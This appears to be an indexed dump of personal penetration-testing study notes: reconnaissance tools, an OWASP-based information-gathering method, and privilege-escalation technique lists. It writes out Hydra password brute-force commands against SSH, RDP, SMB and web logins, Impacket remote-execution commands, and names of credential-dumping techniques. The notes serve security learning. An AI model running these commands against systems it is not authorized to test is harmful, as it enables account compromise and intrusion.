    ","tags":["pentesting","enumeration","server enumeration","web server","fingerprinting"]},{"location":"httrack/","title":"HTTrack - A tool for mirrowing sites","text":"

    HTTrack is a free (GPL, libre/free software) offline browser utility that allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.

    HTTrack arranges the original site's relative link-structure. Simply open a page of the \"mirrored\" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.

    ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"httrack/#installation","title":"Installation","text":"

    Link to the project: https://www.httrack.com/.

    sudo apt-get install httrack\n
    ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"httrack/#basic-usage","title":"Basic usage","text":"

    Create a folder in which to replicate your target site.

    mkdir targetsite\nhttrack domain.com  targetsite/\n

    Interactive mode:

    httrack\n
    ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"hugo/","title":"Hugo","text":""},{"location":"hugo/#install-hugo","title":"Install Hugo","text":"
    sudo apt-get install hugo\n
    "},{"location":"hugo/#hugo-basic-commands","title":"Hugo basic commands","text":"

    Go to your project folder and create a new site

    hugo new site <name-project>\n

    Initialize the repo

    git init\n

    Launch the Hugo server so you can open the site at http://localhost:1313

    hugo server\n

    Create new content, like for instance:

    • A new chapter:
    hugo new --kind chapter hugo/_index.md\n
    • A new entry:
    hugo new hugo/quick_start.md\n
    "},{"location":"hydra/","title":"Hydra","text":"

    Hydra can attack nearly 50 services including Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, and Telnet. It uses a module for each protocol.

    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"hydra/#basic-commands","title":"Basic commands","text":"
    # Main syntax:\nhydra -L users.txt -P pass.txt <service://server> <options>\n\n# Get information about a module\nhydra -U rdp\n\n# Attack a telnet service\nhydra -L users.txt -P pass.txt telnet://target.server\n\n# Attack an SSH service\nhydra -L user.list -P password.list ssh://$ip\n\n# Attack RDP on 3389\nhydra -L user.list -P password.list rdp://$ip\n\n# Attack samba\nhydra -L user.list -P password.list smb://$ip\n\n# Attack a web resource\nhydra -L users.txt -P pass.txt http-get://localhost/\n# -l: specify login name\n# -L: specify a list with login names\n# -p: specify a single password\n# -P: specify a file with passwords\n# -C: specify a file with user:password\n# -t: how many parallel connections to run when cracking\n# -V: verbose\n# -f: stop the attack after finding a password\n# -M: list of servers to attack, one entry per line, ':' to specify port\n\n# To see the syntax of the http-get and http-post-form modules:\nhydra -U http-post-form\n# This will return:\n#    <url>:<form parameters>:<condition string>[:<optional>[:<optional>]\n#    Example: \"/login.php:userin=^USER^&passin=^PASS^:incorrect\"\n#    It performs the attack on the login.php page. It uses the input field name userin (or any other; we need to retrieve this from the HTML code of the form) to insert the dictionary for users, and the input field name passin (likewise taken from the form's HTML) to insert the dictionary for passwords. It uses the word incorrect to check the result of the login process (we need to observe the web behaviour to pick a word). For example:\nhydra -l pentester -P /usr/share/wordlists/metasploit/password.lst zev0nlxhh78mfshrhzvq9h8vm.eu-central-4.attackdefensecloudlabs.com http-post-form \"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1:S=Success\"\n\n# Example for FTP on a non-default port\nhydra -L users.txt -P pass.txt ftp://$ip:2121\n
    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"hydra/#real-life-examples","title":"Real-life examples","text":"
    hydra crack.me http-post-form \u201c/login.php:usr=^USER^&pwd=^PASS^:invalid credential\u201d -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt -f\n\nhydra 192.168.1.45 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V\n\nhydra -l student -P /usr/share/wordlists/rockyou.txt  ssh://192.153.213.3\n
    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"i3/","title":"i3 - A windows management tool","text":"

    Some tips from an experienced user:

    • https://www.reddit.com/r/i3wm/comments/zjq8yf/some_tips_on_how_to_take_advantage_of_i3wm/
    • https://github.com/cknadler/vim-anywhere
    • https://i3wm.org/docs/userguide.html

    "},{"location":"i3/#config-file","title":"Config file","text":"

    Located at ~/.config/i3/config

    You can add your own configurations.

    "},{"location":"i3/#quick-guide","title":"Quick guide","text":"
    # Open a terminal window. By default it will open horizontally\n$mod+Enter\n\n# Open next window vertically\n$mod+v\n\n# Open next window horizontally\n$mod+h\n\n# Select your parent container. With a selection of containers, you can act on all of them at once, for example to close them\n$mod+a\n\n# Move the position of the tiled windows\n$mod+Shift+Arrows // and move the windows around\n\n# Close a window\n$mod+Shift+Q\n\n# Enter full-screen mode\n$mod+f\n\n# Switch workspace\n$mod+num // To switch to workspace 2: $mod+2.\n\n# Moving windows to workspaces\n$mod+Shift+num // where num is the target workspace\n\n# Restarting i3\n$mod+Shift+r\n\n# Exiting i3\n$mod+Shift+e\n
    "},{"location":"i3/#customization","title":"Customization","text":""},{"location":"i3/#locking-screen","title":"Locking screen","text":"

    In my case I've added a shortcut to lock the screen:

    # keybinding to lock screen\nbindsym $mod+Control+l exec \"i3lock -c 000000\"\n

    This requires the tools i3lock (usually already installed) and xautolock (not preinstalled):

    sudo apt install i3lock xautolock\n
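
    xautolock can then trigger the same locker after a period of inactivity; a sketch for the i3 config, assuming a 10-minute timeout:

    # lock automatically after 10 minutes of inactivity\nexec --no-startup-id xautolock -time 10 -locker \"i3lock -c 000000\"\n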
    "},{"location":"i3/#scratchpad","title":"Scratchpad","text":"

    Also, I've added scratchpad shortcuts

    # Make the currently focused window a scratchpad\nbindsym $mod+Shift+space move scratchpad\n\n# Show the first scratchpad window\nbindsym $mod+space scratchpad show\n
    "},{"location":"impacket-ntlmrelayx/","title":"ntlmrelayx - a module from Impacket","text":"","tags":["pentesting","smb"]},{"location":"impacket-ntlmrelayx/#installation","title":"Installation","text":"

    Download from: https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py

    ","tags":["pentesting","smb"]},{"location":"impacket-psexec/","title":"Impacket PsExec","text":"

    PsExec works by copying a service executable to the target's ADMIN$ share and creating a Windows service from it; the service then creates a named pipe that can send commands to the system.

    ","tags":["pentesting","smb"]},{"location":"impacket-psexec/#installation","title":"Installation","text":"

Download from the Impacket repository: https://github.com/fortra/impacket (impacket-psexec ships with the Impacket examples).

    ","tags":["pentesting","smb"]},{"location":"impacket-psexec/#basic-commands","title":"Basic commands","text":"
    # Get help \nimpacket-psexec -h\n\n# Connect to a remote machine with a local administrator account\nimpacket-psexec administrator:'<password>'@$ip\n
    ","tags":["pentesting","smb"]},{"location":"impacket-smbexec/","title":"Impacket SMBExec","text":"

Impacket SMBExec takes a similar approach to PsExec, but without using&nbsp;RemComSvc. This implementation goes one step further, instantiating a local SMB server to receive the output of the commands, which is useful when the target machine does NOT have a writeable share available.

    ","tags":["pentesting","windows"]},{"location":"impacket-smbexec/#installation","title":"Installation","text":"

Download from the Impacket repository: https://github.com/fortra/impacket (impacket-smbexec ships with the Impacket examples).

    ","tags":["pentesting","windows"]},{"location":"impacket-smbexec/#basic-commands","title":"Basic commands","text":"
    # Get help \nimpacket-smbexec -h\n\n# Connect to a remote machine with a local administrator account\nimpacket-smbexec administrator:'<password>'@$ip\n
    ","tags":["pentesting","windows"]},{"location":"impacket/","title":"Impacket - A python tool for network protocols","text":"","tags":["pentesting","windows"]},{"location":"impacket/#what-for","title":"What for?","text":"

    Impacket is a collection of Python classes for working with network protocols. For instance:

    • Ethernet, Linux \"Cooked\" capture.
    • IP, TCP, UDP, ICMP, IGMP, ARP.
    • IPv4 and IPv6 Support.
    • NMB and SMB1, SMB2 and SMB3 (high-level implementations).
    • MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
    • Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
    • Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI.
    • Portions of TDS (MSSQL) and LDAP protocol implementations.
    ","tags":["pentesting","windows"]},{"location":"impacket/#installation","title":"Installation","text":"
    git clone https://github.com/SecureAuthCorp/impacket.git\ncd impacket\npip3 install .\n\n# OR:\nsudo python3 setup.py install\n\n# In case you are missing some modules:\npip3 install -r requirements.txt\n\n# In case you don't have pip3 (pip for Python3) installed, or Python3, install it with the following commands\nsudo apt install python3 python3-pip\n
    ","tags":["pentesting","windows"]},{"location":"impacket/#basic-tools-included","title":"Basic tools included","text":"
    • samrdump
    • smbserver
    • PsExec
    ","tags":["pentesting","windows"]},{"location":"index-linux-privilege-escalation/","title":"Index for Linux Privilege Escalation","text":"Guides to have at hand
    • HackTricks. Written by the creator of WinPEAS and LinPEAS.
    • Vulnhub PrivEsc Cheatsheet.
    • s0cm0nkey's Security Reference Guide.

This is a nice summary related to Local Privilege Escalation by @s4gi_.

    ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#basic-commands-for-reconnaissance","title":"Basic commands for reconnaissance","text":"

    Some basic commands once you have gained access to a Linux machine:

    whoami\npwd\nid\nuname -a\nlsb_release -a\n
    ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#enumeration-scripts","title":"Enumeration scripts","text":"

    Enumeration scripts

    • Scan the Linux system with \"linEnum\".
    • Search for possible paths to escalate privileges with \"linPEAS\".
    • Enumerate privileges with \"Linux Privilege Checker\" tool.
    • Enumerate possible exploits with \"Linux Exploit Suggester\" tool.
    ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#privilege-escalation-techniques","title":"Privilege escalation techniques","text":"

    Techniques

    • Cron jobs: path, wildcards, file overwrite.
    • Daemons.
    • Dirty cow.
    • File Permissions:
      • Configuration files.
      • Startup scripts.
      • Process capabilities: getcap
      • Suid binaries: shared object injection, symlink, environmental variables.
      • Lxd privileges escalation.
    • Kernel vulnerability exploitation.
    • LD_PRELOAD / LD_LIBRARY_PATH.
    • NFS.
    • Password Mining: logs, memory, history, configuration files.
    • Sudo: shell escape sequences, abuse intended functionality.
    • ssh keys.
    ","tags":["privilege escalation"]},{"location":"index-windows-privilege-escalation/","title":"Index for Windows Privilege Escalation","text":"Guides to have at hand
    • HackTricks. Written by the creator of WinPEAS and LinPEAS.
    • Vulnhub PrivEsc Cheatsheet.
    • s0cm0nkey's Security Reference Guide.

This is a nice summary related to Local Privilege Escalation by @s4gi_.

    ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#enumeration-scripts","title":"Enumeration scripts","text":"

    Enumeration scripts

    • Windows Privilege Escalation Awesome Scripts: winPEAS tool.
    • Seatbelt.
    • JAWS.
    ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#privilege-escalation-techniques","title":"Privilege escalation techniques","text":"

    Techniques

    • Services:
      • DLL Hacking.
• Unquoted Path.
      • Named Pipes.
      • Registry.
      • Windows binaries: LOLBAS.
• binPath.
      • Abusing a service with PowerUp.ps1
    • Kernel.
    • Password Mining:
      • Cached SAM.
      • Cached LSASS.
      • Pass The Hash.
      • Configuration files: unattend.xml, SiteList.xml, web.config, vnc.ini.
      • Logs.
      • Credentials in recently accessed files/executed commands
• Memory: mimikatz, Process Dump (minidump).
      • .rdp Files.
      • Registry: HKCU\\Software\\USERNAME\\PuTTY\\Sessions, AutoLogon, VNC.
    • Registry:
      • Autorun.
      • AlwaysInstallElevated
    • Scheduled Tasks:
      • Binary Overwrite.
      • Missing binary.
    • Hot Potato.
    • Startup Applications
    ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#privilege-escalation-tools","title":"Privilege escalation tools","text":"
• CrackMapExec.
    • mimikatz.
    ","tags":["privilege escalation","windows"]},{"location":"information-gathering/","title":"Information gathering","text":"Sources for these notes
    • Hack The Box: Penetration Testing Learning Path
    • INE eWPT2 Preparation course
    • OWASP Web Security Testing Guide 4.2 > 1. Information Gathering
    • My own notes coming from experience pentesting.
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#methodology","title":"Methodology","text":"

    Information gathering is typically broken down into two types:

    • Passive information gathering - Involves gathering as much information as possible without actively engaging with the target.
    • Active information gathering/Enumeration - Involves gathering as much information as possible by actively engaging with the target system. (You will require authorization in order to perform active information gathering).
Passive Information Gathering:

• Identifying domain names and domain ownership information.
• Discovering hidden/disallowed files and directories.
• Identifying web server IP addresses & DNS records.
• Identifying web technologies being used on target sites.
• WAF detection.
• Identifying subdomains.
• Identify website content structure.

Active Information Gathering/Enumeration:

• Identify website content structure.
• Downloading & analyzing website/web app source code.
• Port scanning & service discovery.
• Web server fingerprinting.
• Web application scanning.
• DNS Zone Transfers.
• Subdomain enumeration via Brute-Force.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#1-passive-information-gathering","title":"1. Passive information gathering","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#11-fingerprint-web-server","title":"1.1. Fingerprint Web Server","text":"

Also known as passive server enumeration.

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

ID 1.2 (WSTG-INFO-02, Fingerprint Web Server). Objective: Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#host-command","title":"host command","text":"

    DNS lookup utility.

    host domain.com\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whois-command","title":"whois command","text":"

    WHOIS is a query and response protocol that is used to query databases that store the registered users or organizations of an internet resource like a domain name or an IP address block.

    WHOIS lookups can be performed through the command line interface via the whois client or through some third party web-based tools to lookup the domain ownership details from different databases.

     whois $TARGET\n
    whois.exe <TARGET>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#netcraft","title":"netcraft","text":"

Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used. Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration allows it.

Netcraft also surfaces other details, such as the CMS and server-side technologies in use.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#censys","title":"censys","text":"

    https://search.censys.io/

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#shodan","title":"Shodan","text":"
    • https://www.shodan.io/
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wayback-machine","title":"Wayback machine","text":"

    We can access several versions of these websites using the Wayback Machine to find old versions that may have interesting comments in the source code or files that should not be there.

    We can also use the tool waybackurls to inspect URLs saved by Wayback Machine and look for specific keywords. Installation:

    go install github.com/tomnomnom/waybackurls@latest\n

    Basic usage:

    waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#12-passive-dns-enumeration","title":"1.2. Passive DNS enumeration","text":"

    A valuable resource for this information is the Domain Name System (DNS). We can query DNS to identify the DNS records associated with a particular domain or IP address.

    • Complete DNS enumeration guide: definition and techniques.

Some of these tools can also be used in active DNS enumeration.

    Worth trying: DNSRecon.

• Google dorks: Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using.
• crt.sh: collects information about SSL certificates. If you visit a domain and it contains a certificate, you can extract other subdomains by using the View Certificate functionality.
• dnscan: Python wordlist-based DNS subdomain scanner.
• DNSRecon: preinstalled with Kali Linux; dnsrecon is a simple Python script that gathers DNS-oriented information on a given target.
• dnsdumpster.com: DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attacker's perspective is an important part of the security assessment process.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#13-reviewing-server-metafiles","title":"1.3. Reviewing server metafiles","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.5. Review Webpage content for Information Leakage

ID 1.5 (WSTG-INFO-05, Review Webpage Content for Information Leakage). Objectives: Review webpage comments, metadata, and redirect bodies to find any information leakage. Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. Identify if source map files or other front-end debug files exist.

Some of these files (a quick existence check with curl follows the list):

    • robots.txt
    • sitemap.xml
    • security.txt (proposed standard which allows websites to define security policies and contact details.)
• humans.txt (initiative for knowing the people behind a website.)
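
A minimal sketch to check which of these files exist on a target (example.com is a placeholder):

# Request each common metafile and print the HTTP status code\nfor f in robots.txt sitemap.xml .well-known/security.txt humans.txt; do echo -n \"/$f: \"; curl -s -o /dev/null -w \"%{http_code}\\n\" \"https://example.com/$f\"; done\n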
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#14-conduct-search-search-engine-discovery","title":"1.4. Conduct search Search Engine Discovery","text":"

    Dorking

    • Complete google dork guide.
    • Complete github dork guide.

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.1. Conduct search engine discovery reconnaissance for information leakage

ID 1.1 (WSTG-INFO-01, Conduct Search Engine Discovery Reconnaissance for Information Leakage). Objective: Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#15-fingerprint-web-application-technology-and-frameworks","title":"1.5. Fingerprint web application technology and frameworks","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.8. Fingerprint Web Application Framework

ID 1.8 (WSTG-INFO-08, Fingerprint Web Application Framework). Objectives: Fingerprint the components being used by the web applications. Find the type of web application framework/CMS from HTTP headers, cookies, source code, specific files and folders, and error messages.

    If we discover the webserver behind the target application, it can give us a good idea of what operating system is running on the back-end server.

    For instance:

    • IIS 6.0: Windows Server 2003
    • IIS 7.0-8.5: Windows Server 2008 / Windows Server 2008R2
    • IIS 10.0 (v1607-v1709): Windows Server 2016
    • IIS 10.0 (v1809-): Windows Server 2019

Although this is usually correct when dealing with Windows, we cannot be sure in the case of Linux or BSD-based distributions, as they can run different web server versions.

    How to spot a web server?

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#http-headers","title":"HTTP headers","text":"

X-Powered-By and cookies:

• .NET: ASPSESSIONID<RANDOM>=<COOKIE_VALUE>
• PHP: PHPSESSID=<COOKIE_VALUE>
• JAVA: JSESSION=<COOKIE_VALUE>
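
A minimal curl sketch to grab these fingerprinting headers and cookies (example.com is a placeholder):

curl -s -I https://example.com | grep -iE \"server|x-powered-by|set-cookie\"\n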

    More manual techniques on OWASP 4.2: WSTG-INFO-08

    Banner Grabbing / Web Server Headers

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whatweb","title":"whatweb","text":"

whatweb.

    whatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wappalyzer","title":"Wappalyzer","text":"

Wappalyzer

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wafw00f","title":"wafw00f","text":"

wafw00f:

    wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#aquatone","title":"Aquatone","text":"

    Aquatone

    cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#builtwith","title":"BuiltWith","text":"

Browser addon BuiltWith: BuiltWith\u00ae covers 93,551+ internet technologies, which include analytics, advertising, hosting, CMS and many more.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#curl","title":"Curl","text":"

    Curl:

    curl -IL https://<TARGET>\n# -I: --head (HTTP  FTP  FILE) Fetch the headers only!\n# -L, --location: (HTTP) If the server reports that the requested page has moved to a different location (indicated with a Location: header and a 3XX response  code),  this  option  will make  curl  redo the request on the new place. If used together with -i, --include or -I, --head, headers from all requested pages will be shown. \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap","title":"nmap","text":"

    nmap:

    sudo nmap -v $ip --script banner.nse\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#16-waf-detection","title":"1.6. WAF detection","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wafw00f_1","title":"wafw00f","text":"

wafw00f:

    wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_1","title":"nmap","text":"

    nmap:

    nmap -p443 --script http-waf-detect <host>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#17-code-analysis-httrack-and-eyewitness","title":"1.7. Code analysis: HTTRack and EyeWitness","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.7. Map Execution Paths through applications

ID 1.7 (WSTG-INFO-07, Map Execution Paths Through Application). Objectives: Map the target application and understand the principal workflows. Use an HTTP(s) proxy spider/crawler feature aligned with an application walkthrough.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#httrack","title":"HTTRack","text":"

    HTTRack tutorial

    Create a folder for replicating in it your target.

    mkdir targetsite\nhttrack domain.com  targetsite/\n

    Interactive mode:

    httrack\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#eyewitness","title":"EyeWitness","text":"

    EyeWitness tutorial

    First, create a file with the target domains, like for instance, listOfdomains.txt.

    Then, run:

    eyewitness --web -f listOfdomains.txt -d path/to/save/\n

    After that you will get a report.html file with the request and a screenshot of those domains.

    # Proxing the request via BurpSuite\neyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#18-passive-crawling-with-burp-suite","title":"1.8. Passive crawling with Burp Suite","text":"

    Crawling is the process of navigating around the web application, following links, submitting forms and logging in (where possible) with the objective of mapping out and cataloging the web application and the navigational paths within it.

    Crawling is typically passive as engagement with the target is done via what is publicly accessible, we can utilize Burp Suite\u2019s passive crawler to help us map out the web application to better understand how it is setup and how it works.

    BurpSuite Community edition has only Crawler feature available. For spidering, you need Pro edition.

    OWASP Zap has both Spider and Crawler features available.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#2-active-information-gathering","title":"2. Active information gathering","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#21-enumerate-applications-and-services-on-webserver","title":"2.1. Enumerate applications and services on Webserver","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.4. Enumerate Applications on Webserver

ID 1.4 (WSTG-INFO-04, Enumerate Applications on Webserver). Objectives: Enumerate the applications within the scope that exist on a web server. Find applications hosted on the webserver (virtual hosts/subdomains), non-standard ports, DNS zone transfers.

    Hostname discovery

    nmap --script smb-os-discovery $ip\n

    Scanning the IP looking for services:

nmap -sV -sC <target>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#22-web-server-fingerprinting","title":"2.2. Web Server Fingerprinting","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

ID 1.2 (WSTG-INFO-02, Fingerprint Web Server). Objective: Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#http-headers-and-source-code","title":"HTTP headers and source code","text":"

HTTP headers and HTML source code (with Burp Suite and curl), or Ctrl+U in the browser to view the source code.

    • Note the response header Server, X-Powered-By, or X-Generator as well.
• Identify framework-specific cookies. For instance, the CAKEPHP cookie for CakePHP (PHP).
    • Review the source code and identify <meta> or attributes with typical patterns from some servers (and/or frameworks).
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_2","title":"nmap","text":"

    Conduct an scan

    nmap -sV -F target\n

    If a server version found is potentially vulnerable, use searchsploit:

    searchsploit apache 2.4.18\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#metasploit","title":"metasploit","text":"

    Additionally you can use metasploit:

use auxiliary/scanner/http/http_version\n
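
The same module can be run non-interactively from the shell; a minimal sketch (the RHOSTS value is a placeholder):

msfconsole -q -x \"use auxiliary/scanner/http/http_version; set RHOSTS 10.10.10.10; run; exit\"\n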
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whatweb_1","title":"whatweb","text":"

    whatweb.

    # version of web servers, supporting frameworks, and applications\nwhatweb $ip\nwhatweb <hostname>\n\n# Automate web application enumeration across a network.\nwhatweb --no-errors $ip/24\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nikto","title":"Nikto","text":"

    nikto.

    nikto -h domain.com -o nikto.html -Format html\n\n\nnikto -h http://domain.com/index.php?page=target-page.php -Tuning 5 -Display V\n# -Display V : turn verbose mode on\n# -Tuning 5 : Level 5 is considered aggressive, covering a wide range of tests but may also increase the likelihood of false positives. \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#23-directoryfile-enumeration","title":"2.3. Directory/File enumeration","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_3","title":"nmap","text":"
    nmap -sV -p80 --script=http-enum <target>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dirb","title":"dirb","text":"

    Cheat sheet with dirb.

    dirb http://domain.com /usr/share/metasploit-framework/data/wordlists/directory.txt\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster","title":"gobuster","text":"

    Gobuster:

gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,404 -x .php,.txt -r\n# -b: exclude specific HTTP response codes from the results\n# -r: follow redirects\n# -x: append these extensions to the paths provided by the dictionary\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#ffuf","title":"Ffuf","text":"

    Ffuf:

    ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n# Assuming that the default virtualhost response size is 4242 bytes, we can filter out all the responses of that size (`-fs 4242`)while fuzzing the Host - header:\nffuf -w /path/to/vhost/wordlist -u https://target -H \"Host: FUZZ\" -fs 4242\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wfuzz","title":"Wfuzz","text":"

    Wfuzz

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#feroxbuster","title":"feroxbuster","text":"

    feroxbuster

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#amass","title":"amass","text":"

    amass

amass enum -active -d crapi.apisec.ai -ip -brute -dir path/to/save/results/\n# enum: Perform enumerations and network mapping\n# -active: Attempt zone transfer and certificate name grabs, among others.\n# -ip: Show IP addresses of cached subdomains.\n# -brute: Perform a brute force DNS attack.\n\namass enum -passive -d crapi.apisec.ai -src -dir path/to/save/results/\n# enum: Perform enumerations and network mapping.\n# -passive: Performs a passive scan\n# -src: display sources of the host domain.\n# -dir: Specify a folder to save results.\n\namass intel -d crapi.apisec.ai\n# intel: Discover targets for enumerations. It automates active enumeration.\n

    Some flags:

-active: Attempt zone transfer and certificate name grabs.\n-passive: Passive fingerprinting.\n-bl: Blacklist of subdomain names that will not be investigated\n-d: to specify a domain\n-ip: Show IP addresses of cached subdomains.\n--include-unresolvable: output DNS names that did not resolve.\n-o file.txt: To output the result into a file\n-w: path to a different wordlist file\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#spidering-with-owasp-zap","title":"Spidering with OWASP ZAP","text":"

Spidering is an active technique. It is the process of automatically discovering new resources (URLs) on a web application/site. It typically begins with a list of target URLs called seeds; the spider visits these URLs, identifies hyperlinks in the pages, adds them to the list of URLs to visit, and repeats the process recursively.

    Spidering can be quite loud and as a result, it is typically considered to be an active information gathering technique.

    We can utilize OWASP ZAP\u2019s Spider to automate the process of spidering a web application to map out the web application and learn more about how the site is laid out and how it works.

    BurpSuite Community edition has only Crawler feature available. For spidering, you need Pro edition.

    OWASP Zap has both Spider and Crawler features available.
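
ZAP can also be driven headlessly. A minimal sketch using the zap-baseline.py script shipped with the ZAP Docker image (the image tag is an assumption; adjust it to your installation):

docker run --rm -t ghcr.io/zaproxy/zaproxy:stable zap-baseline.py -t https://example.com\n# Spiders the target for a short period and passively scans all responses\n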

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#24-active-dns-enumeration","title":"2.4. Active DNS enumeration","text":"

    Domain Name System (DNS) is a protocol that is used to resolve domain names/hostnames to IP addresses. During the early days of the internet, users would have to remember the IP addresses of the sites that they wanted to visit, DNS resolves this issue by mapping domain names (easier to recall) to their respective IP addresses.

    A DNS server (nameserver) is like a telephone directory that contains domain names and their corresponding IP addresses. A plethora of public DNS servers have been set up by companies like Cloudflare (1.1.1.1) and Google (8.8.8.8). These DNS servers contain the records of almost all domains on the internet.

    DNS interrogation is the process of enumerating DNS records for a specific domain. The objective of DNS interrogation is to probe a DNS server to provide us with DNS records for a specific domain. This process can provide us with important information like the IP address of a domain, subdomains, mail server addresses etc.

    More about DNS enumeration.

• dnsenum: multithreaded Perl script to enumerate DNS information of a domain and to discover non-contiguous IP blocks.
• dig: discover non-contiguous IP blocks.
• fierce: DNS scanner that helps locate non-contiguous IP space and hostnames.
